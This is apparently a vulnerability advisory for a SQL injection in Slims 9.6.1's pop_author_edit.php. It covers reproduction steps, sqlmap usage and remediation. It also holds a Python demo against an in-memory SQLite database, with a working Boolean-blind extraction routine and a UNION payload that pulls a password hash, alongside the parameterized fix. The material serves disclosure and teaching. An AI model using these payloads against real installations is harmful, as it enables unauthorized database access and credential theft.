Slims SQL Injection Vulnerability in pop_author_edit.php

Vulnerability

A SQL injection vulnerability has been identified in Slims (Senayan Library Management Systems) 9 Bulian, version 9.6.1. The issue resides in admin/modules/bibliography/pop_author_edit.php, where the request parameters 'biblio_id' and 'authorID' are concatenated directly into a SQL query without validation or escaping. An attacker who can reach this script can place SQL syntax in the 'authorID' parameter to alter the query, reading or modifying data the page was never meant to expose and, depending on the privileges of the database account the application uses, compromising the entire database. Because the script lives under the admin module, check what access that module requires in your deployment when assessing exposure.

Impact

Exploitation allows an attacker to manipulate the database query issued by the page and thereby read data they should not see, modify data, or, where the application's database account permits it, perform administrative operations on the database. The vulnerability was confirmed to be exploitable through Boolean-based blind, time-based blind and UNION query injection techniques, so data can be extracted even when the page does not echo query results directly: the attacker only needs a true/false difference in the response or a measurable delay.

Reproduction

To reproduce this vulnerability, intercept a request to admin/modules/bibliography/pop_author_edit.php and modify the 'authorID' parameter so that it carries SQL syntax instead of a plain integer. Compare the response for a valid identifier with an appended condition that is always true against the same identifier with a condition that is always false; a consistent difference between the two responses confirms Boolean-based blind injection, while a database error message or unexpected data in the page indicates the query was altered. Tools such as sqlmap can automate this: point it at the captured request with -p authorID (supplying the session cookie with --cookie if the admin module requires one) to confirm and exploit the injection.

Remediation

Users are advised to update to the latest version of Slims. For code-level remediation, both 'biblio_id' and 'authorID' are numeric identifiers, so the page should reject any value that is not an integer before it is used, and the query should bind the values through a prepared statement (parameterized query) rather than concatenating them into the SQL text. Escaping alone is a weaker fix and easy to get wrong. Running the application against a database account with only the privileges it needs limits what a successful injection can reach.
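The following is an added illustration and is not code from the Slims project or from the original advisory. It rebuilds the flaw in Python against an in-memory SQLite database (the table and column names mst_author, author_id, author_name, user and passwd are assumptions chosen for the demo, not the real Slims schema), shows how a Boolean-based blind oracle on authorID recovers a secret one character at a time and how a UNION payload returns another table's column directly, and then shows the integer-validated, parameterized lookup that the remediation section calls for. Time-based blind injection is not shown because SQLite has no sleep function.

```python
import re
import sqlite3
from typing import Callable, Optional

Lookup = Callable[[sqlite3.Connection, str], Optional[str]]


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the application database.
    Table and column names are assumptions for this demo, not the real
    Slims schema."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE mst_author (author_id INTEGER PRIMARY KEY, author_name TEXT)")
    con.executemany("INSERT INTO mst_author VALUES (?, ?)",
                    [(1, "Ann Author"), (2, "Bob Writer")])
    con.execute("CREATE TABLE user (user_id INTEGER PRIMARY KEY, username TEXT, passwd TEXT)")
    con.execute("INSERT INTO user VALUES (1, 'admin', 'secret-hash')")
    return con


def lookup_author_vulnerable(con: sqlite3.Connection, author_id: str) -> Optional[str]:
    """Mirrors the flaw described above: the authorID parameter is pasted
    straight into the SQL text, so any SQL syntax it carries is executed."""
    sql = "SELECT author_name FROM mst_author WHERE author_id=" + author_id
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def lookup_author_fixed(con: sqlite3.Connection, author_id: str) -> Optional[str]:
    """Hardened form: reject anything that is not a plain ASCII integer, then
    bind the value as a parameter so it can never be parsed as SQL."""
    if not re.fullmatch(r"[0-9]+", author_id):
        raise ValueError("authorID must be a non-negative integer")
    row = con.execute("SELECT author_name FROM mst_author WHERE author_id=?",
                      (int(author_id),)).fetchone()
    return row[0] if row else None


def boolean_oracle(lookup: Lookup, con: sqlite3.Connection, condition: str) -> bool:
    """Boolean-based blind probe: author 1 exists, so the page still shows a
    name exactly when the injected condition evaluates to true."""
    return lookup(con, f"1 AND ({condition})") is not None


def extract_string(lookup: Lookup, con: sqlite3.Connection,
                   subquery: str, max_len: int = 64) -> str:
    """Recover the single-row result of `subquery` one character at a time,
    binary-searching the printable ASCII range with the oracle."""
    out = ""
    for pos in range(1, max_len + 1):
        if not boolean_oracle(lookup, con, f"length(({subquery}))>={pos}"):
            break  # ran past the end of the secret
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if boolean_oracle(lookup, con, f"unicode(substr(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def union_leak(lookup: Lookup, con: sqlite3.Connection) -> Optional[str]:
    """UNION-based probe: with a non-existent author_id the only row returned
    comes from the injected SELECT. The fixed lookup rejects the input."""
    try:
        return lookup(con, "0 UNION SELECT passwd FROM user")
    except ValueError:
        return None


if __name__ == "__main__":
    db = make_db()
    secret = "SELECT passwd FROM user WHERE username='admin'"
    print("UNION, vulnerable:", union_leak(lookup_author_vulnerable, db))
    print("blind, vulnerable:", extract_string(lookup_author_vulnerable, db, secret))
    print("UNION, fixed:     ", union_leak(lookup_author_fixed, db))
    print("normal, fixed:    ", lookup_author_fixed(db, "1"))
```

The blind extraction issues roughly seven oracle requests per character, which is the same cost profile sqlmap's Boolean-based technique has against the real page; the fixed lookup never reaches the database with attacker-controlled syntax, so both the UNION and the blind probes fail at input validation.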

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 3.4
impact: 3.1
exploitability: 6.3
remediation: 0.0
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.